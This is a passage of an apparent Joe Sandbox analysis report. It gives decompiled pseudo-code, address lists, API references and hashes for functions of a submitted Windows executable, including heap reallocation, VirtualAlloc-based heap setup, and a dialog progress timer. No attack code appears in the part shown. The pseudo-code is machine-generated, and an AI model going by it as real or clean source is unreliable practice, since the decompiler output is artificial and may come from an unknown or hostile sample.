						} while (_v8 < 4);
						 *0x4256dc = 1;
						 *0x4256c8 = _a4;
						_t40 = E00418031(_a4);
						_t71 = 0x4256d0;
						asm("movsd");
						asm("movsd");
						 *0x4258e4 = _t40;
						asm("movsd");
					}
					goto L31;
				} else {
					L1:
					_t77 = 0;
				}
				L33:
				E0041576B(0x19);
				return _t77;
			}
































                              0x00417e45
                              0x00417e52
                              0x00417e55
                              0x00417e5c
                              0x00417e5f
                              0x00417e68
                              0x00417e6a
                              0x00417fc6
                              0x00417fc6
                              0x00417e70
                              0x00417e70
                              0x00417e70
                              0x00417e72
                              0x00417e77
                              0x00417e77
                              0x00417e79
                              0x00000000
                              0x00000000
                              0x00417e7b
                              0x00417e7e
                              0x00417e7f
                              0x00417e84
                              0x00000000
                              0x00417e86
                              0x00417e8b
                              0x00417e93
                              0x00417e94
                              0x00417e96
                              0x00417fbd
                              0x00417fc4
                              0x00417fd5
                              0x00417fd5
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00417e9c
                              0x00417e9e
                              0x00417ea5
                              0x00417ead
                              0x00417eb0
                              0x00417eb2
                              0x00417eb3
                              0x00417eb9
                              0x00417faa
                              0x00417faa
                              0x00417ebf
                              0x00417ebf
                              0x00417ec3
                              0x00417ec9
                              0x00417ecc
                              0x00417ecc
                              0x00417ece
                              0x00417ed0
                              0x00000000
                              0x00000000
                              0x00417ed6
                              0x00417eda
                              0x00417edd
                              0x00417edd
                              0x00417edf
                              0x00000000
                              0x00000000
                              0x00417ee5
                              0x00417eec
                              0x00417eec
                              0x00417f7a
                              0x00417f7b
                              0x00417f7f
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00417f7f
                              0x00417ecc
                              0x00417f85
                              0x00417f85
                              0x00417f87
                              0x00417f87
                              0x00417f8e
                              0x00417f8f
                              0x00417f8f
                              0x00417f9d
                              0x00417fa2
                              0x00417fa2
                              0x00417fb3
                              0x00417fb8
                              0x00417fb9
                              0x00417fba
                              0x00417fcb
                              0x00417fcb
                              0x00000000
                              0x00417fcb
                              0x00417e96
                              0x00000000
                              0x00417e84
                              0x00417eef
                              0x00417ef5
                              0x00417f00
                              0x00417f02
                              0x00417f02
                              0x00417f05
                              0x00417f06
                              0x00417f06
                              0x00417f0c
                              0x00417f0c
                              0x00417f0f
                              0x00417f11
                              0x00417f13
                              0x00417f13
                              0x00417f13
                              0x00417f16
                              0x00417f18
                              0x00000000
                              0x00000000
                              0x00417f1a
                              0x00417f1d
                              0x00417f20
                              0x00417f22
                              0x00417f27
                              0x00417f27
                              0x00417f2d
                              0x00417f2d
                              0x00417f33
                              0x00417f34
                              0x00417f34
                              0x00417f2d
                              0x00417f39
                              0x00417f3a
                              0x00417f3d
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00417f3d
                              0x00417f13
                              0x00417f3f
                              0x00417f3f
                              0x00417f42
                              0x00417f45
                              0x00417f45
                              0x00417f4e
                              0x00417f59
                              0x00417f5e
                              0x00417f69
                              0x00417f6e
                              0x00417f6f
                              0x00417f71
                              0x00417f76
                              0x00417f76
                              0x00000000
                              0x00417e61
                              0x00417e61
                              0x00417e61
                              0x00417e61
                              0x00417fd8
                              0x00417fda
                              0x00417fe6

                              APIs
                                • Part of subcall function 0041570A: InitializeCriticalSection.KERNEL32(00000000,00000000,?,?,00416FB2,00000009,00000000,00000000,00000001,00415548,00000001,00000074,?,?,00000000,00000001), ref: 00415747
                                • Part of subcall function 0041570A: EnterCriticalSection.KERNEL32(?,?,?,00416FB2,00000009,00000000,00000000,00000001,00415548,00000001,00000074,?,?,00000000,00000001), ref: 00415762
                              • GetCPInfo.KERNEL32(00000000,?,?,00000000,00000000,?,?,00414BA4), ref: 00417E8B
                                • Part of subcall function 0041576B: LeaveCriticalSection.KERNEL32(?,00413F70,00000009,00413F5C,00000000,?,00000000,00000000,00000000), ref: 00415778
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: CriticalSection$EnterInfoInitializeLeave
                              • String ID: +B$WB$WB
                              • API String ID: 1866836854-4076192905
                              • Opcode ID: ee95e9d0b24a19a0cc788d9683df54c17a7a80f6c3da06404699baeb333cbe61
                              • Instruction ID: 91cfe2518806d3d9ee68befd2fe7c4d9c34af4d87c59522c175cbc6726151178
                              • Opcode Fuzzy Hash: ee95e9d0b24a19a0cc788d9683df54c17a7a80f6c3da06404699baeb333cbe61
                              • Instruction Fuzzy Hash: FC41243164C654AEE720DB24D8853EB7BF1AB05314FB4406BE5488B291CABD49C7C74C
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0041458F Relevance: 6.5, APIs: 5, Instructions: 278COMMON
                              Download Yara Rule
                              C-Code - Quality: 68%
                              			E0041458F(void* _a4, long _a8) {
				signed int _v8;
				intOrPtr _v20;
				long _v36;
				void* _v40;
				intOrPtr _v44;
				char _v48;
				long _v52;
				long _v56;
				char _v60;
				intOrPtr _t56;
				void* _t57;
				long _t58;
				long _t59;
				long _t63;
				long _t66;
				long _t68;
				long _t71;
				long _t72;
				long _t74;
				long _t78;
				intOrPtr _t80;
				void* _t83;
				long _t85;
				long _t88;
				void* _t89;
				long _t91;
				intOrPtr _t93;
				void* _t97;
				void* _t104;
				long _t113;
				long _t116;
				intOrPtr _t122;
				void* _t123;

				_push(0xffffffff);
				_push(0x41b9b8);
				_push(E00414A2C);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t122;
				_t123 = _t122 - 0x28;
				_t97 = _a4;
				_t113 = 0;
				if(_t97 != 0) {
					_t116 = _a8;
					__eflags = _t116;
					if(_t116 != 0) {
						_t56 =  *0x425a38; // 0x1
						__eflags = _t56 - 3;
						if(_t56 != 3) {
							__eflags = _t56 - 2;
							if(_t56 != 2) {
								while(1) {
									_t57 = 0;
									__eflags = _t116 - 0xffffffe0;
									if(_t116 <= 0xffffffe0) {
										__eflags = _t116 - _t113;
										if(_t116 == _t113) {
											_t116 = 1;
										}
										_t116 = _t116 + 0x0000000f & 0xfffffff0;
										__eflags = _t116;
										_t57 = HeapReAlloc( *0x425a34, _t113, _t97, _t116);
									}
									__eflags = _t57 - _t113;
									if(_t57 != _t113) {
										goto L64;
									}
									__eflags =  *0x4233b4 - _t113; // 0x0
									if(__eflags == 0) {
										goto L64;
									}
									_t58 = E00415868(_t116);
									__eflags = _t58;
									if(_t58 != 0) {
										continue;
									}
									goto L63;
								}
								goto L64;
							}
							__eflags = _t116 - 0xffffffe0;
							if(_t116 <= 0xffffffe0) {
								__eflags = _t116;
								if(_t116 <= 0) {
									_t116 = 0x10;
								} else {
									_t116 = _t116 + 0x0000000f & 0xfffffff0;
								}
								_a8 = _t116;
							}
							while(1) {
								_v40 = _t113;
								__eflags = _t116 - 0xffffffe0;
								if(_t116 <= 0xffffffe0) {
									E0041570A(9);
									_pop(_t104);
									_v8 = 1;
									_t63 = E004167F8(_t97,  &_v60,  &_v48);
									_t123 = _t123 + 0xc;
									_t113 = _t63;
									_v52 = _t113;
									__eflags = _t113;
									if(_t113 == 0) {
										_v40 = HeapReAlloc( *0x425a34, 0, _t97, _t116);
									} else {
										__eflags = _t116 -  *0x42283c; // 0x1e0
										if(__eflags < 0) {
											_t100 = _t116 >> 4;
											_t71 = E00416BC0(_t104, _v60, _v48, _t113, _t116 >> 4);
											_t123 = _t123 + 0x10;
											__eflags = _t71;
											if(_t71 == 0) {
												_t72 = E00416894(_t104, _t100);
												_v40 = _t72;
												__eflags = _t72;
												if(_t72 != 0) {
													_t74 = ( *_t113 & 0x000000ff) << 4;
													_v56 = _t74;
													__eflags = _t74 - _t116;
													if(_t74 >= _t116) {
														_t74 = _t116;
													}
													E00414090(_v40, _a4, _t74);
													E0041684F(_v60, _v48, _t113);
													_t123 = _t123 + 0x18;
												}
											} else {
												_v40 = _a4;
											}
											_t97 = _a4;
										}
										__eflags = _v40;
										if(_v40 == 0) {
											_t66 = HeapAlloc( *0x425a34, 0, _t116);
											_v40 = _t66;
											__eflags = _t66;
											if(_t66 != 0) {
												_t68 = ( *_t113 & 0x000000ff) << 4;
												_v56 = _t68;
												__eflags = _t68 - _t116;
												if(_t68 >= _t116) {
													_t68 = _t116;
												}
												E00414090(_v40, _t97, _t68);
												E0041684F(_v60, _v48, _t113);
												_t123 = _t123 + 0x18;
											}
										}
									}
									_t51 =  &_v8;
									 *_t51 = _v8 | 0xffffffff;
									__eflags =  *_t51;
									E00414868();
								}
								_t57 = _v40;
								__eflags = _t57 - _t113;
								if(_t57 != _t113) {
									goto L64;
								}
								__eflags =  *0x4233b4 - _t113; // 0x0
								if(__eflags == 0) {
									goto L64;
								}
								_t59 = E00415868(_t116);
								__eflags = _t59;
								if(_t59 != 0) {
									continue;
								}
								goto L63;
							}
							goto L64;
						} else {
							goto L5;
						}
						do {
							L5:
							_v40 = _t113;
							__eflags = _t116 - 0xffffffe0;
							if(_t116 > 0xffffffe0) {
								L25:
								_t57 = _v40;
								__eflags = _t57 - _t113;
								if(_t57 != _t113) {
									goto L64;
								}
								__eflags =  *0x4233b4 - _t113; // 0x0
								if(__eflags == 0) {
									goto L64;
								}
								goto L27;
							}
							E0041570A(9);
							_v8 = _t113;
							_t80 = E00415A9D(_t97);
							_v44 = _t80;
							__eflags = _t80 - _t113;
							if(_t80 == _t113) {
								L21:
								_v8 = _v8 | 0xffffffff;
								E0041471A();
								__eflags = _v44 - _t113;
								if(_v44 == _t113) {
									__eflags = _t116 - _t113;
									if(_t116 == _t113) {
										_t116 = 1;
									}
									_t116 = _t116 + 0x0000000f & 0xfffffff0;
									__eflags = _t116;
									_a8 = _t116;
									_v40 = HeapReAlloc( *0x425a34, _t113, _t97, _t116);
								}
								goto L25;
							}
							__eflags = _t116 -  *0x425a30; // 0x0
							if(__eflags <= 0) {
								_push(_t116);
								_push(_t97);
								_push(_t80);
								_t88 = E004162A6();
								_t123 = _t123 + 0xc;
								__eflags = _t88;
								if(_t88 == 0) {
									_push(_t116);
									_t89 = E00415DF1();
									_v40 = _t89;
									__eflags = _t89 - _t113;
									if(_t89 != _t113) {
										_t91 =  *((intOrPtr*)(_t97 - 4)) - 1;
										_v36 = _t91;
										__eflags = _t91 - _t116;
										if(_t91 >= _t116) {
											_t91 = _t116;
										}
										E00414090(_v40, _t97, _t91);
										_t93 = E00415A9D(_t97);
										_v44 = _t93;
										_push(_t97);
										_push(_t93);
										E00415AC8();
										_t123 = _t123 + 0x18;
									}
								} else {
									_v40 = _t97;
								}
							}
							__eflags = _v40 - _t113;
							if(_v40 == _t113) {
								__eflags = _t116 - _t113;
								if(_t116 == _t113) {
									_t116 = 1;
									_a8 = _t116;
								}
								_t116 = _t116 + 0x0000000f & 0xfffffff0;
								_a8 = _t116;
								_t83 = HeapAlloc( *0x425a34, _t113, _t116);
								_v40 = _t83;
								__eflags = _t83 - _t113;
								if(_t83 != _t113) {
									_t85 =  *((intOrPtr*)(_t97 - 4)) - 1;
									_v36 = _t85;
									__eflags = _t85 - _t116;
									if(_t85 >= _t116) {
										_t85 = _t116;
									}
									E00414090(_v40, _t97, _t85);
									_push(_t97);
									_push(_v44);
									E00415AC8();
									_t123 = _t123 + 0x14;
								}
							}
							goto L21;
							L27:
							_t78 = E00415868(_t116);
							__eflags = _t78;
						} while (_t78 != 0);
						goto L63;
					} else {
						E00413F9F(_t97);
						L63:
						_t57 = 0;
						__eflags = 0;
						goto L64;
					}
				} else {
					_t57 = E00413E65(_a8);
					L64:
					 *[fs:0x0] = _v20;
					return _t57;
				}
			}




































                              0x00414592
                              0x00414594
                              0x00414599
                              0x004145a4
                              0x004145a5
                              0x004145ac
                              0x004145b2
                              0x004145b5
                              0x004145b9
                              0x004145c9
                              0x004145cc
                              0x004145ce
                              0x004145dc
                              0x004145e1
                              0x004145e4
                              0x00414723
                              0x00414726
                              0x00414873
                              0x00414873
                              0x00414875
                              0x00414878
                              0x0041487a
                              0x0041487c
                              0x00414880
                              0x00414880
                              0x00414884
                              0x00414884
                              0x00414890
                              0x00414890
                              0x00414896
                              0x00414898
                              0x00000000
                              0x00000000
                              0x0041489a
                              0x004148a0
                              0x00000000
                              0x00000000
                              0x004148a3
                              0x004148a9
                              0x004148ab
                              0x00000000
                              0x00000000
                              0x00000000
                              0x004148ab
                              0x00000000
                              0x00414873
                              0x0041472c
                              0x0041472f
                              0x00414731
                              0x00414733
                              0x0041473f
                              0x00414735
                              0x00414738
                              0x00414738
                              0x00414740
                              0x00414740
                              0x00414743
                              0x00414743
                              0x00414746
                              0x00414749
                              0x00414751
                              0x00414756
                              0x00414757
                              0x00414767
                              0x0041476c
                              0x0041476f
                              0x00414771
                              0x00414774
                              0x00414776
                              0x00414836
                              0x0041477c
                              0x0041477c
                              0x00414782
                              0x00414786
                              0x00414791
                              0x00414796
                              0x00414799
                              0x0041479b
                              0x004147a6
                              0x004147ac
                              0x004147af
                              0x004147b1
                              0x004147b6
                              0x004147b9
                              0x004147bc
                              0x004147be
                              0x004147c0
                              0x004147c0
                              0x004147c9
                              0x004147d5
                              0x004147da
                              0x004147da
                              0x0041479d
                              0x004147a0
                              0x004147a0
                              0x004147dd
                              0x004147dd
                              0x004147e0
                              0x004147e4
                              0x004147ef
                              0x004147f5
                              0x004147f8
                              0x004147fa
                              0x004147ff
                              0x00414802
                              0x00414805
                              0x00414807
                              0x00414809
                              0x00414809
                              0x00414810
                              0x0041481c
                              0x00414821
                              0x00414821
                              0x004147fa
                              0x004147e4
                              0x00414839
                              0x00414839
                              0x00414839
                              0x0041483d
                              0x0041483d
                              0x00414842
                              0x00414845
                              0x00414847
                              0x00000000
                              0x00000000
                              0x00414849
                              0x0041484f
                              0x00000000
                              0x00000000
                              0x00414852
                              0x00414858
                              0x0041485a
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00414860
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x004145ea
                              0x004145ea
                              0x004145ea
                              0x004145ed
                              0x004145f0
                              0x004146e7
                              0x004146e7
                              0x004146ea
                              0x004146ec
                              0x00000000
                              0x00000000
                              0x004146f2
                              0x004146f8
                              0x00000000
                              0x00000000
                              0x00000000
                              0x004146f8
                              0x004145f8
                              0x004145fe
                              0x00414602
                              0x00414608
                              0x0041460b
                              0x0041460d
                              0x004146b7
                              0x004146b7
                              0x004146bb
                              0x004146c0
                              0x004146c3
                              0x004146c5
                              0x004146c7
                              0x004146cb
                              0x004146cb
                              0x004146cf
                              0x004146cf
                              0x004146d2
                              0x004146e4
                              0x004146e4
                              0x00000000
                              0x004146c3
                              0x00414613
                              0x00414619
                              0x0041461b
                              0x0041461c
                              0x0041461d
                              0x0041461e
                              0x00414623
                              0x00414626
                              0x00414628
                              0x0041462f
                              0x00414630
                              0x00414636
                              0x00414639
                              0x0041463b
                              0x00414640
                              0x00414641
                              0x00414644
                              0x00414646
                              0x00414648
                              0x00414648
                              0x0041464f
                              0x00414655
                              0x0041465a
                              0x0041465d
                              0x0041465e
                              0x0041465f
                              0x00414664
                              0x00414664
                              0x0041462a
                              0x0041462a
                              0x0041462a
                              0x00414628
                              0x00414667
                              0x0041466a
                              0x0041466c
                              0x0041466e
                              0x00414672
                              0x00414673
                              0x00414673
                              0x00414679
                              0x0041467c
                              0x00414687
                              0x0041468d
                              0x00414690
                              0x00414692
                              0x00414697
                              0x00414698
                              0x0041469b
                              0x0041469d
                              0x0041469f
                              0x0041469f
                              0x004146a6
                              0x004146ab
                              0x004146ac
                              0x004146af
                              0x004146b4
                              0x004146b4
                              0x00414692
                              0x00000000
                              0x004146fe
                              0x004146ff
                              0x00414705
                              0x00414705
                              0x00000000
                              0x004145d0
                              0x004145d1
                              0x004148ad
                              0x004148ad
                              0x004148ad
                              0x00000000
                              0x004148ad
                              0x004145bb
                              0x004145be
                              0x004148af
                              0x004148b2
                              0x004148bd
                              0x004148bd

                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 97048a31ed7e8673145bc5a0b9288faae4c75299d979c6b38067687c3c285a89
                              • Instruction ID: b0a20c71c01645f6642c62949d543ab21d76ee58160ce25a59b39075e73dd19d
                              • Opcode Fuzzy Hash: 97048a31ed7e8673145bc5a0b9288faae4c75299d979c6b38067687c3c285a89
                              • Instruction Fuzzy Hash: 4691E671D01514ABCB21AB69DC85ADEBBB4EFC5764F240227F818B62D0D7398DC1CA6C
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0041659C Relevance: 6.4, APIs: 5, Instructions: 102memoryCOMMONLIBRARYCODE
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E0041659C() {
				void* _t25;
				intOrPtr* _t28;
				void* _t42;
				void* _t43;
				void* _t45;
				void* _t55;

				if( *0x420828 != 0xffffffff) {
					_t43 = HeapAlloc( *0x425a34, 0, 0x2020);
					if(_t43 == 0) {
						goto L20;
					}
					goto L3;
				} else {
					_t43 = 0x420818;
					L3:
					_t42 = VirtualAlloc(0, 0x400000, 0x2000, 4);
					if(_t42 == 0) {
						L18:
						if(_t43 != 0x420818) {
							HeapFree( *0x425a34, 0, _t43);
						}
						L20:
						return 0;
					}
					if(VirtualAlloc(_t42, 0x10000, 0x1000, 4) == 0) {
						VirtualFree(_t42, 0, 0x8000);
						goto L18;
					}
					if(_t43 != 0x420818) {
						 *_t43 = 0x420818;
						_t25 =  *0x42081c; // 0x420818
						 *(_t43 + 4) = _t25;
						 *0x42081c = _t43;
						 *( *(_t43 + 4)) = _t43;
					} else {
						if( *0x420818 == 0) {
							 *0x420818 = 0x420818;
						}
						if( *0x42081c == 0) {
							 *0x42081c = 0x420818;
						}
					}
					_t3 = _t42 + 0x400000; // 0x400000
					_t4 = _t43 + 0x98; // 0x98
					 *((intOrPtr*)(_t43 + 0x14)) = _t3;
					_t6 = _t43 + 0x18; // 0x18
					_t28 = _t6;
					 *((intOrPtr*)(_t43 + 0xc)) = _t4;
					 *(_t43 + 0x10) = _t42;
					 *((intOrPtr*)(_t43 + 8)) = _t28;
					_t45 = 0;
					do {
						_t55 = _t45 - 0x10;
						_t45 = _t45 + 1;
						 *_t28 = ((0 | _t55 >= 0x00000000) - 0x00000001 & 0x000000f1) - 1;
						 *((intOrPtr*)(_t28 + 4)) = 0xf1;
						_t28 = _t28 + 8;
					} while (_t45 < 0x400);
					E00417DA0(_t42, 0, 0x10000);
					while(_t42 <  *(_t43 + 0x10) + 0x10000) {
						 *(_t42 + 0xf8) =  *(_t42 + 0xf8) | 0x000000ff;
						_t16 = _t42 + 8; // -4088
						 *_t42 = _t16;
						 *((intOrPtr*)(_t42 + 4)) = 0xf0;
						_t42 = _t42 + 0x1000;
					}
					return _t43;
				}
			}









                              0x004165a7
                              0x004165c3
                              0x004165c7
                              0x00000000
                              0x00000000
                              0x00000000
                              0x004165a9
                              0x004165a9
                              0x004165cd
                              0x004165e3
                              0x004165e7
                              0x004166c2
                              0x004166c8
                              0x004166d3
                              0x004166d3
                              0x004166d9
                              0x00000000
                              0x004166d9
                              0x004165ff
                              0x004166bc
                              0x00000000
                              0x004166bc
                              0x0041660c
                              0x0041662c
                              0x0041662e
                              0x00416633
                              0x00416636
                              0x0041663f
                              0x0041660e
                              0x00416615
                              0x00416617
                              0x00416617
                              0x00416623
                              0x00416625
                              0x00416625
                              0x00416623
                              0x00416641
                              0x00416647
                              0x0041664d
                              0x00416650
                              0x00416650
                              0x00416653
                              0x00416656
                              0x00416659
                              0x0041665c
                              0x00416663
                              0x00416665
                              0x0041666f
                              0x00416670
                              0x00416672
                              0x00416675
                              0x00416678
                              0x00416684
                              0x0041668c
                              0x00416695
                              0x0041669c
                              0x0041669f
                              0x004166a1
                              0x004166a8
                              0x004166a8
                              0x00000000
                              0x004166b0

                              APIs
                              • HeapAlloc.KERNEL32(00000000,00002020,00420818,00420818,?,?,00416A68,00000000,00000010,00000000,00000009,00000009,?,00413F4F,00000010,00000000), ref: 004165BD
                              • VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,?,00416A68,00000000,00000010,00000000,00000009,00000009,?,00413F4F,00000010,00000000), ref: 004165E1
                              • VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,?,?,00416A68,00000000,00000010,00000000,00000009,00000009,?,00413F4F,00000010,00000000), ref: 004165FB
                              • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00416A68,00000000,00000010,00000000,00000009,00000009,?,00413F4F,00000010,00000000,?), ref: 004166BC
                              • HeapFree.KERNEL32(00000000,00000000,?,?,00416A68,00000000,00000010,00000000,00000009,00000009,?,00413F4F,00000010,00000000,?,00000000), ref: 004166D3
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: AllocVirtual$FreeHeap
                              • String ID:
                              • API String ID: 714016831-0
                              • Opcode ID: 3cebd7198669312bdcb80342c8511f4e4e3300f6cdfd7be81cbf94ce20f50e4e
                              • Instruction ID: 0af9858cac0a30669fb94f5f64461d90f8de944a7195c69e4f59e8ed45fdce2d
                              • Opcode Fuzzy Hash: 3cebd7198669312bdcb80342c8511f4e4e3300f6cdfd7be81cbf94ce20f50e4e
                              • Instruction Fuzzy Hash: 983101B0700705EBD3309F24EC45BA2BBE4EB44794F12823AE55597791E778E8818BCC
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00409787 Relevance: 6.1, APIs: 4, Instructions: 98COMMON
                              Download Yara Rule
                              C-Code - Quality: 93%
                              			E00409787(void* __ecx, void* __edx) {
				signed int _t48;
				intOrPtr* _t54;
				signed int _t60;
				intOrPtr _t61;
				void* _t76;
				struct _CRITICAL_SECTION* _t80;
				signed int _t81;
				void* _t84;
				void* _t86;

				_t76 = __edx;
				E00413954(E00419CC0, _t86);
				_t84 = __ecx;
				_t80 = __ecx + 0x40;
				if(E004095DD(_t80) == 0) {
					E0040998D(__ecx);
					EnterCriticalSection(_t80);
					_t60 =  *(_t80 + 0x20);
					 *(_t86 - 0x10) =  *(_t80 + 0x24);
					 *((intOrPtr*)(_t86 - 0x20)) =  *((intOrPtr*)(_t80 + 0x28));
					 *((intOrPtr*)(_t86 - 0x1c)) =  *((intOrPtr*)(_t80 + 0x2c));
					LeaveCriticalSection(_t80);
					if(_t60 !=  *((intOrPtr*)(_t84 + 0x28)) ||  *(_t86 - 0x10) !=  *((intOrPtr*)(_t84 + 0x2c))) {
						E0040969B(_t84, _t60,  *(_t86 - 0x10));
					}
					E0040970E(_t84,  *((intOrPtr*)(_t86 - 0x20)),  *((intOrPtr*)(_t86 - 0x1c)));
					_t81 = 0;
					if((_t60 |  *(_t86 - 0x10)) == 0) {
						 *(_t86 - 0x10) = _t81;
						_t60 = 1;
					}
					_t61 = E00413D80(E00414490( *((intOrPtr*)(_t86 - 0x20)),  *((intOrPtr*)(_t86 - 0x1c)), 0x64, _t81), _t76, _t60,  *(_t86 - 0x10));
					if(_t61 !=  *((intOrPtr*)(_t84 + 0x34))) {
						asm("cdq");
						E00403A0B(_t86 - 0xa4, _t76, _t47, _t76);
						E00401C80(_t86 - 0x18, _t86 - 0xa4);
						 *(_t86 - 4) = _t81;
						E00407D25(_t86 - 0x18, _t76, L"% ");
						_push(_t84 + 0xc);
						_t54 = E00402634(_t86 - 0x24, _t86 - 0x18);
						 *(_t86 - 4) = 1;
						E00406049( *((intOrPtr*)(_t84 + 4)),  *_t54);
						E00403A9C( *((intOrPtr*)(_t86 - 0x24)));
						 *((intOrPtr*)(_t84 + 0x34)) = _t61;
						E00403A9C( *((intOrPtr*)(_t86 - 0x18)));
					}
					_t48 = 1;
				} else {
					_t48 = 1;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t86 - 0xc));
				return _t48;
			}












                              0x00409787
                              0x0040978c
                              0x00409798
                              0x0040979b
                              0x004097a7
                              0x004097b3
                              0x004097b9
                              0x004097c2
                              0x004097c5
                              0x004097cb
                              0x004097d2
                              0x004097d5
                              0x004097de
                              0x004097ee
                              0x004097ee
                              0x004097fb
                              0x00409807
                              0x00409808
                              0x0040980c
                              0x0040980f
                              0x0040980f
                              0x00409829
                              0x0040982e
                              0x00409830
                              0x00409839
                              0x00409848
                              0x00409855
                              0x00409858
                              0x00409863
                              0x00409867
                              0x00409871
                              0x00409875
                              0x0040987d
                              0x00409885
                              0x00409888
                              0x0040988e
                              0x0040988f
                              0x004097a9
                              0x004097a9
                              0x004097a9
                              0x00409897
                              0x0040989f

                              APIs
                              • __EH_prolog.LIBCMT ref: 0040978C
                                • Part of subcall function 004095DD: EnterCriticalSection.KERNEL32(?,?,?,00409903), ref: 004095E2
                                • Part of subcall function 004095DD: LeaveCriticalSection.KERNEL32(?,?,?,00409903), ref: 004095EC
                              • EnterCriticalSection.KERNEL32(?), ref: 004097B9
                              • LeaveCriticalSection.KERNEL32(?), ref: 004097D5
                              • __aulldiv.LIBCMT ref: 00409824
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: CriticalSection$EnterLeave$H_prolog__aulldiv
                              • String ID:
                              • API String ID: 3848147900-0
                              • Opcode ID: 985cff57d02d2bbd00f179e979cdbab89758c627aa779ce2aa11222f2ed784f0
                              • Instruction ID: 0a470d0c852558693c62499fef9fcf54cb9603282822d0262474d13d459b1607
                              • Opcode Fuzzy Hash: 985cff57d02d2bbd00f179e979cdbab89758c627aa779ce2aa11222f2ed784f0
                              • Instruction Fuzzy Hash: D2316076A00219AFCB10EFA1C881AEFBBB5FF48314F00442EE10573692CB79AD45CB64
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 004095F7 Relevance: 6.0, APIs: 4, Instructions: 37windowtimeCOMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E004095F7(void* __ecx) {
				void* _t32;

				_t32 = __ecx;
				 *(__ecx + 0x28) =  *(__ecx + 0x28) | 0xffffffff;
				 *(__ecx + 0x2c) =  *(__ecx + 0x2c) | 0xffffffff;
				 *(__ecx + 0x34) =  *(__ecx + 0x34) | 0xffffffff;
				 *((char*)(__ecx + 0x38)) = 1;
				E00413260(__ecx + 0x3c);
				 *((intOrPtr*)(_t32 + 0x30)) = GetDlgItem( *(__ecx + 4), 0x3e8);
				if( *(_t32 + 0x70) >= 0) {
					SendMessageA( *(_t32 + 4), 0x80, 1, LoadIconA( *0x423144,  *(_t32 + 0x70) & 0x0000ffff));
				}
				 *((intOrPtr*)(_t32 + 8)) = SetTimer( *(_t32 + 4), 3, 0x64, 0);
				E00406049( *(_t32 + 4),  *((intOrPtr*)(_t32 + 0xc)));
				E0040998D(_t32);
				return 1;
			}




